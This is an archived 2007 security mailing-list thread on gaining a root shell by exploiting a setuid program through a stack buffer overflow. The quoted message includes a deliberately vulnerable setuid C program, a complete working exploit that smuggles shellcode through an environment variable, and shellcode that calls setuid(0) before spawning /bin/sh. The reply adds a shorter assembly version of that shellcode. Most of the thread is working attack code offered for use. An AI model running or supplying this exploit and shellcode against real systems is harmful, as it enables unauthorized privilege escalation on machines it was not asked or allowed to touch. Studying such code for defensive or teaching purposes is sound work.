From: John McGuire (jmcguire81@gmail.com)
Date: Wed Feb 28 2007 - 14:20:43 EST
Here is the assembly I finally came up with for this. It shaves off a
byte if space is critical:
//setuid(0), Opcode 17
"\x31\xdb" // xorl %ebx,%ebx
"\x8d\x43\x17" // leal 0x17(%ebx),%eax //eax
= ebx+0x17
"\xcd\x80" // int $0x80
John
On 2/27/07, Fábio Russo <fabio.contin.russo@gmail.com> wrote:
>
> >Try with "setuid(0);" before execve :-)
> >--
> >Andrea "bunker" Purificato
> >+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
> >++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.
> >
> >http://rawlab.mindcreations.com
>
> Hi.
> Some applications need a setuid(0) before the /bin/sh string because
> it have the suid bit set.
> see the exemple below:
>
> // buged program with setuid bit set and root privileges:
>
>
> int main(int argc, char **argv) {
> char env[96];
>
> // Shows the return address for exploiting
> printf("- %p -\n", &env);
> strcpy(env,getenv("BOLINHA"));
> return(0);
>
> }
>
>
>
> //exploit: usage ./exploit <bugged_program> <return addr>
>
> extern char **environ;
> char
> shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> int main(int argc, char **argv)
> {
> char string_longa[128];
> long *ptr = (long *) string_longa;
> int i;
>
> for(i=0; i<32; i++) *(ptr + i) = (int) strtoul(argv[2],NULL,16);
> for(i=0; i<(int) strlen(shellcode); i++) string_longa[i]=shellcode[i];
>
> setenv("BOLINHA", string_longa, 1);
> execle(argv[1], argv[1], NULL, environ);
> printf("%s\n", string_longa);
>
> return (0);
>
> }
>
> Taking a close look into exploit source code we can see that
> the firsts bytes in the shellcode are the setuid(0),
> more preciselly the \x31\xc0\x31\xdb\xb0\x17\xcd\x80.
> This is needed to get a root shell.
> if you cut those bytes off from shellcode, you will get a shell
> that belongs to the user who executed the exploit.
>
> I hope it can be usefull for someone. -: )
>
> bye.
>
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
>
> http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------
>
>
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:37 EDT